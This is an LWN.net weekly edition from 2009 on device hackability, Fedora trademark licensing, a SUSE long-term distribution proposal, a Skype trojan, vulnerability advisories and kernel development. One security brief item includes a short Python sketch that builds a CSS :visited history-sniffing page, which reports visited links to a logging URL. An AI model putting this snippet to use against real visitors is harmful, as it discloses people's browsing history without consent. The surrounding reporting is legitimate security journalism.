LWN.net Weekly Edition for September 3, 2009
Hackable devices: one step forward, one step back
LWN has (like many others) long argued that device manufacturers should leave their products open to modification. Beyond being a simple gesture of respect for customers, hackability increases the value of the device and opens the way to no end of creativity; owners of such a device will often take it in directions that the vendor never dreamed of. We have recently seen a couple of announcements in this area which demonstrate contrasting views on hackability.

On the down side, Sony recently announced a new set of PlayStation 3 systems, featuring more storage, a smaller box, and lower power consumption. This device also "features" the removal of the "install other OS" option. The "other OS" in question was invariably Linux. Users did not normally install Linux for its superior fragging experience; instead, Linux on the PS3 was most useful as an affordable way to gain access to - and hack with - the "Cell" processor architecture. Linux-running PS3 systems could be used to create low-end supercomputing systems and clusters or do any of a number of other interesting things. The locking-down of the newer PS3 models represents a real loss for the Linux community.
The reasoning for this change is said to be cost-cutting; Sony simply did not want to expend the resources to make the "install other OS" option work on the new system. A good chunk of that cost, it seems, is in the creation of a hypervisor under which secondary systems actually run; this hypervisor's reason for existence would appear to be to prevent other operating systems from making use of the 3D rendering engine. One would assume that the above-mentioned superior fragging experience offered by Linux (while legendary) would not be such a threat to Sony that it feels the need to wall off parts of its hardware, but that is evidently not the case. Evidently, the fear of high-performance nethack is enough to drive Linux off this platform entirely.
Sony can certainly build its hardware the way it wishes. But some of us might still wish that the company would look harder at where the raw materials for its products come from. Sony is, of course, a heavy user of embedded Linux; there is a whole range of Sony products with Linux inside. If you read books on a Sony reader, take pictures with a Sony camera, make movies with a Sony recorder, or watch movies on a Sony television, chances are that you're using Linux. Even the Sony WallStation Doorbell Adapter product uses Linux. It's interesting to wander through Sony's download page, where the company satisfies its GPL obligations, and see how many products are listed there.
Sony clearly is deriving great value from Linux. And that is great - that's what Linux is there for. And Sony is not absent from the contributor community; a quick look at kernel contributions since 2.6.26 shows 113 patches from Sony, putting the company just slightly ahead of LWN on the list. But surely Sony will find that Linux is a better platform for its products if it lets the development community play with those products. There are developers out there who (1) built the platform that Sony is using in its products, and (2) would love to help make those products run better. Frustrating those developers does not seem like a path toward long-term success with Linux.
The announcement of Nokia's N900 "mobile computer" shows a different approach. The N900 is a Maemo-based tablet, but, unlike its predecessors, it also functions as a telephone. It looks like a nice device, though, perhaps, a bit large for some pockets. Your editor is convinced that he must obtain one of these phones for review purposes; journalistic integrity demands it.
While the official propaganda attracted a fair amount of attention, many in the community were more struck by Quim Gil's posting on the subject. Cellular telephones are notoriously locked-down devices, but, it seems, the N900 will be different:
Nokia's path toward more open devices has been slow, but the company appears to really understand where its software comes from. Linux is not just a platform it can ship with its phones and avoid royalty charges; it's a living component which can be actively encouraged and helped to improve. If the N900 is successful, it will indeed encourage a new wave of developers who will help to make Linux better for all of us. And, in the process, they will make Maemo-based phones much better for Nokia.
What remains to be seen is how much of this openness remains when the N900 makes it to end users - especially those who buy their phones from their cellular carriers. Truly hackable devices may only be available to those who buy them through other channels, at full price. But the existence of that option is a major step in the right direction. Opening up the cellular carriers is a job for another year - and a lot more patience.
Here we have examples from two companies, both of which are known for making stylish, consumer-oriented devices. Both have chosen to base some of their products on Linux. One has moved in the direction of openness, providing full access to the device in the hope of energizing developers and taking market share from a dominant rival. The other has closed down a product, locking out interested developers, in the name of lowering prices. There is no doubt that the open approach is better for our community than the closed approach. Over the longer term, openness and support for the community really should prove to be better for business as well.
Fedora's trademark license agreement
While trademarks are often lumped together with copyrights and patents—under the poorly termed "intellectual property" umbrella—trademarks are quite different. One of those differences is that a trademark must be actively enforced, at least under US law, or the mark holder risks losing it. The Fedora community is currently discussing a license to allow community members to use the Fedora trademarks, while still protecting Red Hat's ability to defend the mark against those who would misuse it. But, requiring a signed license agreement in order for a community web site to use Fedora trademarks—on the site or in the domain name—seems heavy-handed to some.
Christoph Wickert brought up some concerns with the trademark license agreement (TLA) on the fedora-advisory-board mailing list. He was commenting on an earlier revision of the agreement, which has since been updated as a result of the conversation. One of the more controversial aspects of the agreement is that license termination requires that the domain registration be turned over to Red Hat:
The TLA allows either party to terminate the agreement "for any reason at any time upon thirty (30) days prior notice in writing to the other party" in section 3(a), or, in section 3(c), with no notice in the event of a legal claim against the site. Because of the domain transfer requirement, Wickert was concerned that it could lead to domain hijacking:
It should be noted that the TLA does not require that the contents of the website be handed over. Changes to the content may be required if the license is terminated in order to remove the trademarked items, but the contents would still be the property of the web site owner. Wickert's statement to that effect was simply a misunderstanding of the TLA.
Wickert also sees problems in the indemnification clause. By indemnifying Red Hat against various claims, without any kind of cap, he is worried that "a person could be bankrupt [for] the rest of his life even if he didn't damage Red Hat or Fedora in any way". In the end, he concludes that the TLA is not something he can recommend for others to sign, which is "a shame".
Fedora project leader Paul Frields responded at length to Wickert's concerns, noting:
Another concern was the specific requirements for how the trademarks needed to be used and identified on a site covered by the TLA. Richard Körber complained that those requirements were too restrictive, leaving his site at risk because of minor violations:
Körber concluded that the barrier was just too high: "Frankly, I would rather drop the domain or close down the entire site, before I would sign the TLA". Robert Scheck, who was asked to sign the original TLA back in March, agreed with Körber's conclusion. But, Luis Villa noted that, at some level, the existence of the agreement doesn't change anything:
There is a larger issue as well. Dimitris Glezos worries about the barrier created by requiring a signed agreement:
Glezos argues that any miscreants are not going to sign the agreement anyway, so requiring the TLA just makes it harder for those who want to help spread Fedora. Part of the problem is that the TLA is a legal document, so anyone considering signing it should either be very comfortable with what it means, or, as was suggested in the thread, consult a lawyer. That just creates an additional barrier, as Wickert points out: "Is Red Hat really expecting their community members to pay for a lawyer if they want to contribute? That would be ridiculous."
Frields agrees: "If I thought that this process required people to go get attorneys I'd agree it's an utter failure." The underlying problem, though, is the need for active enforcement of trademarks. By licensing community members to use Fedora trademarks, Red Hat can still pursue other, unlicensed users—some of whom may be using those marks in a way that is detrimental to the project. Furthermore, having engineers try to solve legal problems may not be the best approach, Frields said:
As it turns out, those bug reports did reach someone who can help: Pamela Chestek, a trademark attorney who works for Red Hat. She had a lengthy response to the various questions and problems that had been raised in the thread. Chestek started by trying to allay fears that there was a Red Hat agenda behind the TLA:
In addition, she went point by point through the issues that had been raised. To start with, she explained the reasoning behind clause 3(a), which allowed Red Hat to terminate the license at will, noting that it allowed the Fedora community more flexibility should it decide to change the Fedora name at some point. But, she said, "Because this has been so controversial, though, we can forgo the flexibility and eliminate this basis for termination". The current version of the agreement now reflects that change.
While Chestek's explanation of the domain transfer requirement still may not sit well with some, it does at least explain why it exists:
On the indemnification clause, Chestek explained that it was there to ensure fairness for both sides. In any legal action that was brought against the site for content or behavior that had nothing to do with Red Hat, the site owner would be responsible, but "if the only reason you are in the lawsuit is because you are using the Fedora trademark, Red Hat has to pay the whole amount. That seems fair."
She also addressed the issue of minor problems with how the trademarks were used on the site, noting that the wording requires a "material breach" of the agreement. Chestek pointed out that the trademark guidelines were included by reference in the agreement, "but it would take a flagrant disregard for the Guidelines before it would be considered a 'material' breach". Even if that were to happen, there is a cure provision that would give a site owner seven days to address a problem that Red Hat notified them about.
Overall, Chestek covered the main legal (as opposed to philosophical) issues that were brought up. She clearly listened to the suggestions and complaints, and made changes where she thought it appropriate. The interaction displayed is very different from the sometimes lofty—and unapproachable—position that lawyers tend to occupy. By engaging the community in its normal communication forums, Chestek is well on the way to heading off some serious unhappiness amongst some in the community.
There may still be those who disagree with the TLA, philosophically or because of the language it contains, but, at the very least, everyone should understand the reasoning behind it. Trademark use by free software projects is controversial; we have seen Mozilla also wrestle with the problem and are likely to see other projects do so in the future. It is in a project's best interest to ensure that something called Fedora (or Firefox) is, indeed, the "real McCoy" and not some malware-afflicted knock-off. How exactly that is done will likely evolve over time. Villa sees some hope in the distance:
Various projects have different ways of approaching the trademark issue. Mozilla has a trademark policy that does not require a signed agreement for using its trademarks on a web site, but does have a license [PDF] for using the trademarks in domain names. That license has much of the same content as the Fedora TLA, including transferring the domain if the license is terminated. Other projects, like Linux, have a different strategy: sublicensing the mark for use in other trademarks, but considering most other uses to be "fair use"—though still subject to proper trademark attribution.
Because trademarks have to be actively, and not selectively, enforced, there needs to be a clear delineation as to what is allowed, and what isn't. Whether it truly requires a signed license agreement is an open question, but clearly Red Hat lawyers think it is safer to do things that way. One alternative is for the mark holder to disallow any use by third parties—a much worse outcome.
While it may be distasteful to have to sign some kind of agreement, it may also be the only workable solution that will satisfy Red Hat, which, after all, does own the trademarks. It will be interesting to see how other projects—particularly those backed by a large company—handle the trademark issue down the road.
Toward a long-term SUSE-based distribution
A group of SUSE Linux users put plans in motion last week to create a free, community-managed server distribution that maintains compatibility with Novell's enterprise offerings, but guarantees the long-term support not provided by openSUSE. The result, said organizers, would be similar to the relationship between CentOS and Red Hat Enterprise Linux (RHEL), and would ultimately be beneficial to Novell. There are numerous practical difficulties to be overcome in the creation of this distribution, though, and the form that it might take is not yet clear.
The idea of a free SUSE-based Linux distribution suitable for server use has cropped up more than once in the past; what spurred action this time was the August 14th announcement that openSUSE was moving from a 24-month to an 18-month maintenance period. Boyd Lynn Gerber, a consultant who works with the SUSE Linux Enterprise Server (SLES) and Desktop (SLED) products and participates in the openSUSE project, voiced concern over the change, especially for small-to-medium sized businesses (SMBs) without the financial resources to purchase SLES and SLED support contracts (which start at $799 and $120 per year, respectively). For comparison, SLES and SLED receive general updates for five years, and security patches for seven.
Gerber argued that shortening the supported lifespan of openSUSE widened the gap in the product line between openSUSE and SLES/SLED, potentially making it hard for small businesses to smoothly transition into the enterprise line. He proposed starting a group to work on a distribution in between openSUSE and SLES/SLED — one that would be available without purchasing a support contract from Novell, but would offer a longer, multi-year lifespan with which businesses would be comfortable, in particular guaranteeing backports for critical patches and security fixes.
Multiple options
Gerber's initial plan suggested three possible courses of action: create a support structure to maintain openSUSE backports for a longer period of time (a.k.a. the "OpenSUSE LTS" option), create a new distribution built from the source code releases of SLES but with Novell's trademarks removed (the "OpenSLES" option), or create a new distribution using the latter model, but for SLED instead of SLES (the "OpenSLED" option). The subsequent discussion on the opensuse-project mailing list debated the merits of each alternative, but the level of response also led Gerber to start a separate mailing list on which to further pursue the idea.
The OpenSLED option was quickly dismissed, because the product would be too similar to openSUSE itself, and because SLED does not include any server-oriented packages, so it would do little to meet additional needs for SMBs. Between the OpenSUSE LTS and OpenSLES options, opinion on the new list was evenly split. The pros of OpenSUSE LTS include the relative legal simplicity — creating a derivative of openSUSE does not require permission or even cooperation from Novell — but the cons include significantly higher investment of volunteer time. openSUSE contains more packages than either SLES or SLED, so more patches and backports would be required to maintain it over time.
Furthermore, adding LTS to openSUSE would require creating a framework for triaging, testing, and approving updates and backports well after an openSUSE release's end-of-life, whereas mimicking SLES's lifespan for an OpenSLES distribution could rely on Novell's tested patches. The down side of running an OpenSLES distribution, according to list traffic, is the risk of alienating or angering Novell if the company perceives the effort as siphoning away SLES customers. Gerber and others countered that an OpenSLES would, in reality, attract more customers to SLES by providing a lower barrier to entry, particularly for SMBs.
Supporters of the OpenSLES option compare it to CentOS, which they describe as a popular choice among SMBs either with smaller budgets or merely testing the waters before signing up for enterprise support with RHEL. CentOS, the "Community ENTerprise Operating System", is volunteer-driven, and since 2003 has built its releases from Red Hat's publicly available RHEL source code packages, with Red Hat's trademarks and branding excised. RHEL, like SLES and SLED, has a seven-year support life cycle.
Progress
Thus far, said Gerber, Novell has given the idea a chilly public reception, although he claims that in private conversation members of Novell management have been more open and expressed the view that an OpenSLES could be a tool to gain more SLES customers. "We will need to show or demonstrate to Novell and their upper management that this [is] a good thing to support", he said.
Gerber believes that the OpenSLES option is clearly better than the OpenSUSE LTS option, and has started planning, laying down the groundwork for a non-profit entity to oversee the project, creating initial project guidelines based on the examples provided by CentOS and other derivative distributions, and looking for legal representation to assist with licensing and trademark usage concerns. Just a handful of people participated in the discussion on opensuse-project, but a dozen or so have already joined the new mailing list, and Gerber said the discussion is ongoing in the #opensuse-server IRC channel on Freenode.
Novell did not respond to requests for comment about the project, although SLES manager Gerald Pfeifer did ask several questions about the proposal on the opensuse-project list, particularly about the suggestion that Novell was not properly serving the SMB market.
Although SUSE Linux does not have an ecosystem of derivative distributions like those surrounding Red Hat's products or Debian, there does not appear to be anything preventing such spin-offs from starting up. openSUSE has detailed trademark guidelines [PDF] explicitly covering redistribution and modification projects. SLES and SLED are not covered by that set of guidelines, but Novell has a trademark usage request system through which interested parties can ask for trademark usage approval on a case-by-case basis. As for the software itself, openSUSE is of course a fully open project, and Novell provides source code packages for SLES and SLED on its web site.
Clearly SUSE users and resellers are interested in the possibility of a free alternative to Novell's current enterprise offerings. There are no hard numbers to back up the position that CentOS has directly increased Red Hat's sales of RHEL, but the company certainly tolerates its existence, and CentOS as well as several other highly-focused RHEL derivatives, like Scientific Linux, have continued to thrive. Proposals to build a long-term-support option for existing distributions are no guarantee of success; several efforts to add that support to Fedora have come and gone in recent years. If it is successful, an OpenSLES may be the first step not only toward filling the long-term-support gap, but toward expanding the SUSE-based distribution family.
Good news / bad news
It has been a while since the last LWN update. So here are a couple of items of LWN metadata.

On the "good news" side, we've finally managed to implement an often-requested feature: per-article RSS feeds for readers who want to follow the comments on a specific article in their RSS reader. The feed URL appears in the metadata headers for each article and comment, so subscribing to an article-specific feed should be a matter of a simple mouse click for most readers.
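Feed autodiscovery means that a feed reader can find such a per-article feed without any clicking at all: the URL is advertised in the page's metadata. A small sketch, assuming the feed is exposed through the conventional <link rel="alternate" type="application/rss+xml"> tag; the example markup and feed URL below are invented for illustration and are not LWN's actual markup:

```python
from html.parser import HTMLParser

class FeedLinkFinder(HTMLParser):
    """Collect RSS/Atom feed URLs advertised in a page's <link> headers."""
    FEED_TYPES = {"application/rss+xml", "application/atom+xml"}

    def __init__(self):
        super().__init__()
        self.feeds = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if (tag == "link" and a.get("rel") == "alternate"
                and a.get("type") in self.FEED_TYPES and "href" in a):
            self.feeds.append(a["href"])

# Hypothetical page header, for illustration only; the real LWN
# markup may differ in detail.
page = '''<html><head>
<link rel="alternate" type="application/rss+xml"
      title="Comments on this article"
      href="https://lwn.net/headlines/123456/rss"/>
</head><body>...</body></html>'''

finder = FeedLinkFinder()
finder.feed(page)
print(finder.feeds)  # -> ['https://lwn.net/headlines/123456/rss']
```

This is the same mechanism most desktop feed readers use when handed a plain article URL.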
Of course, the unread comments page remains the best way to follow conversations on LWN, in your editor's humble opinion.
The not-so-good news is this: while LWN has held up reasonably well through this whole "economic crisis" thing, the simple fact is that its effects are being felt here. Some subscribers are not renewing, and others are moving to lower subscription levels. Costs have also increased - for example, our credit card bank evidently was unhappy with the size of its government bailout, so it raised credit card processing rates considerably. We are told that health insurance will be increasing 20-30% in a few months. Needless to say, these things are putting a squeeze on the budget.
What it comes down to is that something will have to change for LWN to continue operating. We very much intend to continue, so we're considering all of the options available to us. Since we're evidently not seen as being too big to fail, those options are generally unpleasant; they include price increases and/or staff reductions. No decisions have been made, but, one way or another, LWN readers are likely to see some changes as we get this operation back onto an even keel.
Thanks, as always, for supporting LWN.
Security
A trojan for Skype
A recent report about a Skype trojan that could extract voice calls as mp3 files and ship them off to other locations led to an interesting discussion on the Fedora users mailing list. The trojan itself is somewhat unsurprising as there have been persistent rumors about wiretapping back doors in Skype for some time. The trojan is Windows-only, but it does come with most of the source code, which makes it interesting to those who study malware. While not a direct threat to Linux users, it does highlight a number of privacy and security issues to ponder.
Skype is a popular voice over IP (VoIP) application that runs on Linux, Mac OS X, and Windows. Part of its appeal is that there are many users of the free (as in beer) software, so folks can make free phone calls to many of their friends and family. But it is a closed source tool that resists attempts to reverse-engineer its protocol, so there are no interoperable free (as in freedom) equivalents.
Daniel B. Thurman brought up the trojan and wondered if it was an example of the back doors or interception facilities that governments have long been rumored to be pushing for Skype. That set off a thread in which "black helicopters" made a tongue-in-cheek appearance, but there were also more serious postings. Marko Vojinovic asked whether there are ongoing attempts to reverse-engineer the Skype protocol:
There are a number of problems with that, as was pointed out, including the likelihood that Skype would change the protocol to cripple interoperability, much as instant messaging companies have done along the way. Roberto Ragusa noted that there have been people who looked at Skype, but they "found that it contains tons and tons of cryptography, obfuscation and countermeasures against debugging or reverse engineering." That is of concern, he said, because one cannot be sure of exactly what it's doing: "A closed source code like that and with an explicit purpose to build a crypted P2P network bypassing firewalls with every trick possible is something to be nervous about."
Alan Cox had some additional thoughts on reverse-engineering the code: "The person who completely reverse engineers skype probably destroys it. If you can write a skype client [then] the spammers can write skype spam tools as well." He also mentions the "mostly circumstantial" evidence that law enforcement has added intercept facilities to Skype itself. Furthermore, anyone who might be working on the problem has good reason to do it quietly, he said:
So, we have a closed source application, which uses malware-like techniques to obfuscate its functioning, and folks willingly run it on their computers. In some ways, that's no different than any other closed source application, but there are a few differences. Skype, by its very nature, must use the network to send encrypted data to multiple untrusted machines elsewhere. While it may not be compromised by governmental authorities in the standard binary, it is a known target of those entities, and this trojan demonstrates a way that it might be compromised. Overall, it would seem there are a few risks to both security and privacy from that kind of application—more so than a closed source word processor or non-networked game.
Free software solutions, like Ekiga, may be able to overcome some of the shortcomings of Skype. But, if those solutions become popular, they are likely to run afoul of the spammers and scammers that Cox warns about. It's likely to be true of regular and cellular phone service as well, but a warning from "Tim" in the thread is worth repeating:
While Skype provides a nice service—without charge in many cases—it does present a bit of a privacy headache. If it can be subverted for wiretapping purposes, it can undoubtedly be subverted for other reasons. Some of those could present security headaches as well. Since we don't really know what the Skype code does when it isn't infected, it will be difficult to determine if its behavior changes in a malicious way. That should be a little worrisome.
Brief items
What the Internet knows about you
A new site at whattheinternetknowsaboutyou.com is an interesting demonstration of CSS-related browser history disclosure vulnerabilities. This site is able to produce a surprisingly comprehensive list of sites that one has visited, down to the level of specific pages on social networking sites and such. No JavaScript required. There's also information on just how the site works and how the disclosure of information can be minimized. "It is a source of amazement to us that such an obvious and well-documented history sniffing channel has been allowed to exist for so many years. We cannot help but wonder why, despite all the malicious potential, such a hole has not yet been closed."
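The underlying trick needs nothing more than a stylesheet: a :visited rule whose background image points at a logging URL causes browsers of this era to fetch that image only for links the user has actually visited, so the server learns the browser's history with no JavaScript involved. A rough sketch of how such a probe page could be generated follows; the probed sites and the /log endpoint are made-up placeholders, not anything the real site uses:

```python
# Generate a test page demonstrating pure-CSS history sniffing:
# each link gets a ":visited" rule whose background image is a
# per-link logging URL, fetched only if the link was visited.
PROBED = ["https://example.org/", "https://example.com/login"]

def sniff_page(urls):
    rules = []
    links = []
    for i, url in enumerate(urls):
        # The background image request doubles as the "visited" signal.
        rules.append(
            "#probe%d:visited { background: url(/log?id=%d); }" % (i, i))
        links.append('<a id="probe%d" href="%s">x</a>' % (i, url))
    return ("<html><head><style>%s</style></head><body>%s</body></html>"
            % ("\n".join(rules), "\n".join(links)))

page = sniff_page(PROBED)
print(page)
```

Defenses discussed on the site amount to either clearing history aggressively or having the browser lie about :visited styling, which is where browser vendors eventually went.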
Illustrating the Linux sock_sendpage() NULL pointer dereference
Ramon de Carvalho Valle has released an exploit for the Linux sock_sendpage NULL pointer dereference vulnerability. The exploit was originally written to determine whether it was exploitable on the Power/Cell architecture, but was later expanded for i386 and x86_64. Many distribution kernels were tested using the exploit, and the results are included in the report to the bugtraq mailing list. The code may be of general interest, but could also be used on other kernels to determine if the problem has been addressed. Click below for the full report along with a link to the code.

Apache.org compromised
The Apache project has suffered a server compromise which took the site off the net for some hours. "To the best of our knowledge at this time, no end users were affected by this incident, and the attackers were not able to escalate their privileges on any machines. While we have no evidence that downloads were affected, users are always advised to check digital signatures where provided."
New vulnerabilities
dnsmasq: heap overflow, NULL pointer dereference
Package(s): dnsmasq
CVE #(s): CVE-2009-2957 CVE-2009-2958
Created: September 1, 2009    Updated: October 14, 2009
Description: From the Red Hat advisory:
Core Security Technologies discovered a heap overflow flaw in dnsmasq when the TFTP service is enabled (the "--enable-tftp" command line option, or by enabling "enable-tftp" in "/etc/dnsmasq.conf"). If the configured tftp-root is sufficiently long, and a remote user sends a request with a long file name, dnsmasq could crash or, possibly, execute arbitrary code with the privileges of the dnsmasq service (usually the unprivileged "nobody" user). (CVE-2009-2957)
A NULL pointer dereference flaw was discovered in dnsmasq when the TFTP service is enabled. This flaw could allow a malicious TFTP client to crash the dnsmasq service. (CVE-2009-2958)
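For administrators wondering whether they are exposed, the advisory's conditions map onto two dnsmasq configuration directives. A hypothetical /etc/dnsmasq.conf fragment that would enable the vulnerable TFTP code path (the option names come from the advisory; the path shown is purely illustrative):

```conf
# TFTP support is off by default; either flaw is reachable only
# when it has been switched on:
enable-tftp
# CVE-2009-2957 additionally requires a sufficiently long tftp-root.
# This path is an illustration, not a recommendation.
tftp-root=/var/lib/tftpboot
```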
gfs2-utils: temporary file vulnerabilities
Package(s): gfs2-utils
CVE #(s): CVE-2008-6552
Created: September 2, 2009    Updated: February 16, 2011
Description: The gfs2-utils package suffers from multiple temporary file vulnerabilities which could be exploited by a local attacker to overwrite arbitrary files.
htmldoc: stack-based buffer overflow
Package(s): htmldoc
CVE #(s):
Created: September 1, 2009    Updated: September 2, 2009
Description: From the Red Hat bugzilla: A stack-based buffer overflow while processing user-supplied input was found in HTMLDOC's routine used to set the result page output size for custom page sizes. A remote attacker could provide a specially-crafted HTML file which, once opened by an unsuspecting user, would lead to a denial of service (htmldoc crash).
ikiwiki: information disclosure
Package(s): ikiwiki
CVE #(s): CVE-2009-2944
Created: September 1, 2009    Updated: April 1, 2010
Description: From the Debian advisory: Josh Triplett discovered that the blacklist for potentially harmful TeX code of the teximg module of the Ikiwiki wiki compiler was incomplete, resulting in information disclosure.
kernel: denial of service
Package(s): kernel
CVE #(s): CVE-2009-2691
Created: August 27, 2009    Updated: March 23, 2010
Description: From the National Vulnerability Database entry: "The mm_for_maps function in fs/proc/base.c in the Linux kernel 2.6.30.4 and earlier allows local users to read (1) maps and (2) smaps files under proc/ via vectors related to ELF loading, a setuid process, and a race condition."
kernel: denial of service
Package(s): kernel
CVE #(s): CVE-2009-2767
Created: August 27, 2009    Updated: October 22, 2009
Description: From the National Vulnerability Database entry: "The init_posix_timers function in kernel/posix-timers.c in the Linux kernel before 2.6.31-rc6 allows local users to cause a denial of service (OOPS) or possibly gain privileges via a CLOCK_MONOTONIC_RAW clock_nanosleep call that triggers a NULL pointer dereference."
libmikmod: two denial of service vulnerabilities
Package(s): libmikmod
CVE #(s): CVE-2007-6720 CVE-2009-0179
Created: August 31, 2009
Updated: October 11, 2010
Description: From the Red Hat bugzilla entries [1 and 2]: CVE-2009-0179: A denial of service flaw was found in the MikMod player, used for playing MOD files. If an attacker would trick the mikmod user to load an XM file, this could lead to denial of service (application crash). CVE-2007-6720: A denial of service flaw was found in the MikMod player, used for playing MOD files. If an attacker would trick the mikmod user to play multiple MOD using files with varying number of channels, this could lead to denial of service (application crash or abort).
mono: cross-site scripting vulnerabilities
Package(s): mono
CVE #(s): CVE-2008-3422
Created: August 27, 2009
Updated: December 7, 2009
Description: From the National Vulnerability Database entry: "Multiple cross-site scripting (XSS) vulnerabilities in the ASP.net class libraries in Mono 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via crafted attributes related to (1) HtmlControl.cs (PreProcessRelativeReference), (2) HtmlForm.cs (RenderAttributes), (3) HtmlInputButton (RenderAttributes), (4) HtmlInputRadioButton (RenderAttributes), and (5) HtmlSelect (RenderChildren)."
openssh: information disclosure
Package(s): openssh
CVE #(s): CVE-2008-5161
Created: September 2, 2009
Updated: March 8, 2010
Description: OpenSSH is vulnerable to a specific man-in-the-middle attack that could allow an attacker to recover a portion of plaintext when the CBC cipher mode is used.
squirrelmail: cross-site request forgery
Package(s): squirrelmail
CVE #(s): CVE-2009-2964
Created: August 31, 2009
Updated: August 13, 2010
Description: From the Mandriva advisory: All form submissions (send message, change preferences, etc.) in SquirrelMail were previously subject to cross-site request forgery (CSRF), wherein data could be sent to them from an offsite location, which could allow an attacker to inject malicious content into user preferences or possibly send emails without user consent (CVE-2009-2964).
wordpress: open redirect vulnerability
Package(s): wordpress
CVE #(s): CVE-2008-6762
Created: August 27, 2009
Updated: September 2, 2009
Description: From the National Vulnerability Database entry: "Open redirect vulnerability in wp-admin/upgrade.php in WordPress, probably 2.6.x, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the backto parameter."
wordpress: denial of service
Package(s): wordpress
CVE #(s): CVE-2008-6767
Created: August 27, 2009
Updated: September 2, 2009
Description: From the National Vulnerability Database entry: "wp-admin/upgrade.php in WordPress, probably 2.6.x, allows remote attackers to upgrade the application, and possibly cause a denial of service (application outage), via a direct request."
wordpress: password vulnerability
Package(s): wordpress
CVE #(s): CVE-2008-4106
Created: August 27, 2009
Updated: September 2, 2009
Description: From the National Vulnerability Database entry: "WordPress before 2.6.2 does not properly handle MySQL warnings about insertion of username strings that exceed the maximum column width of the user_login column, and does not properly handle space characters when comparing usernames, which allows remote attackers to change an arbitrary user's password to a random value by registering a similar username and then requesting a password reset, related to a "SQL column truncation vulnerability.""
wordpress: directory traversal vulnerability
Package(s): wordpress
CVE #(s): CVE-2008-4769
Created: August 27, 2009
Updated: September 2, 2009
Description: From the National Vulnerability Database entry: "Directory traversal vulnerability in the get_category_template function in wp-includes/theme.php in WordPress 2.3.3 and earlier, and 2.5, allows remote attackers to include and possibly execute arbitrary PHP files via the cat parameter in index.php. NOTE: some of these details are obtained from third party information."
wordpress: cross-site request forgery vulnerability
Package(s): wordpress
CVE #(s): CVE-2008-5113
Created: August 27, 2009
Updated: September 2, 2009
Description: From the National Vulnerability Database entry: "WordPress 2.6.3 relies on the REQUEST superglobal array in certain dangerous situations, which makes it easier for remote attackers to conduct delayed and persistent cross-site request forgery (CSRF) attacks via crafted cookies, as demonstrated by attacks that (1) delete user accounts or (2) cause a denial of service (loss of application access). NOTE: this issue relies on the presence of an independent vulnerability that allows cookie injection."
Page editor: Jake Edge
Kernel development
Brief items
Kernel release status
The current development kernel is 2.6.31-rc8, released on August 27. "This should be the last -rc, and it's really been quieting down. There's 131 commits there, and it's all pretty trivial." Linus predicts that the final 2.6.31 release will happen on Labor Day (September 7).
There have been no stable updates in the last week, and none are in the review process as of this writing.
Kernel development news
Quotes of the week
Is it *necessary*? In a world where hardware is perfect, no. In a world where people don't bother buying ECC memory because it's 10% more expensive, and PC builders use the cheapest possible parts --- I think it's a really good idea.
I do hope others see what has happened here, and seriously consider whether they want to get involved in a sniping dictatorial community. Maybe considering to go down the BSD route instead.
In brief
CFS hard limits. The Linux "completely fair scheduler" works by dividing the available CPU time between the processes contending for it. In many situations, though, processes running on the system will not actually use their full fair share; they may spend enough time waiting for I/O, for example, that they simply cannot run enough to use all of the time they are entitled to. In such situations, CFS will give the left-over time to more CPU-intensive processes that can make good use of it, even if those processes have exceeded their allocation.

That is normally the right thing to do; better to put the CPU time to good use than to have the processor go idle while processes want to run. But there are, it seems, situations where system administrators would rather not hand out excess CPU time in that way. If, for example, the processes belong to a customer who is paying for a certain amount of processing time, giving away more could be bad business. To keep this from happening, Bharata B Rao has created the CFS hard limits patch set. Hard limits are managed using control groups; they allow the administrator to set an absolute limit on the amount of CPU time the control group as a whole is able to use over a given period of real time. Billing users who want their limit raised is, of course, a user-space policy issue, so it's not part of this patch.
Discard again. The "discard" operation, which informs a block storage device that specific blocks are no longer in use, should help a wide variety of storage technologies - including solid-state devices and "thin provisioned" arrays - to perform better. But discard, itself, has some performance issues; see the trouble with discard for details.
Christoph Hellwig is trying to improve discard performance with a new set of patches, some of which originally come from Matthew Wilcox. These changes allow discard requests to cover much larger sections of the storage device; previously they had been limited by the maximum request size for the device. When combined with the XFS-specific XFS_IOC_TRIM ioctl() command, this change allows user-space to issue bulk discard operations for all of the free portions of a filesystem partition at an opportune time. The patches also add better control over whether any specific discard request should be seen as a queue barrier and whether it should be performed as a blocking operation.
Upcoming network driver API change. Not content with having reworked the network driver API once (by moving operations into their own structure), Stephen Hemminger now has a new patch set which changes the API implemented by all drivers. The function involved is ndo_start_xmit(), which is used by the networking layer to pass a packet to the driver for transmission. This function should really only return one of two values: NETDEV_TX_OK (meaning that the packet has been accepted and queued for transmission) or NETDEV_TX_BUSY (the packet was not accepted because the queue was full or some similar problem came up). Drivers using the deprecated LLTX mode can also return NETDEV_TX_LOCKED to indicate that the transmit lock was already taken.
The problem is that the return type for ndo_start_xmit() was defined as int; some driver writers thought that meant they could return arbitrary error codes to the networking layer. With Stephen's patch, the return type becomes netdev_tx_t, an enum containing only the defined return codes. That should catch any driver writers who try to return the wrong thing - but at the cost of changing a lot of drivers.
Checkpoint/restore wiki. There is a new wiki dedicated to the collection of information about the rapidly-developing checkpoint/restore functionality. It's a little bare at the moment, but, one assumes, it will soon be filled with information about this feature.
The actual checkpoint/restore task remains an exercise in complexity. As an example, consider one of the most recently-posted pieces: checkpoint and restore for security credentials. It requires a number of hooks into LSM modules to obtain the current security state, serialize it, and to restore it at some future time. It can all probably be made to work, but long-term maintenance could prove to be painful.
The BFS scheduler. Con Kolivas, who worked on desktop interactivity issues before abruptly leaving the kernel development community in 2007, has posted a new scheduler called BFS. Con says:
(See the original LWN posting for the associated comment thread.)
O_*SYNC
When developers think about forcing data written to files to be flushed to the underlying storage device, they tend to think about the fsync() system call. But it is also possible to request synchronous behavior for all operations on a file descriptor, either at open() time or using fcntl(). Support in Linux for synchronous I/O flags is likely to improve in 2.6.32, but this work has raised a couple of interesting issues with regard to the current implementation and forward compatibility.

There are three standard-defined flags which can be used to specify synchronous I/O behavior:
- O_SYNC: requires that any write operations block until all data and all metadata have been written to persistent storage.
- O_DSYNC: like O_SYNC, except that there is no requirement to wait for any metadata changes which are not necessary to read the just-written data. In practice, O_DSYNC means that the application does not need to wait until ancillary information (the file modification time, for example) has been written to disk. Using O_DSYNC instead of O_SYNC can often eliminate the need to flush the file inode on a write.
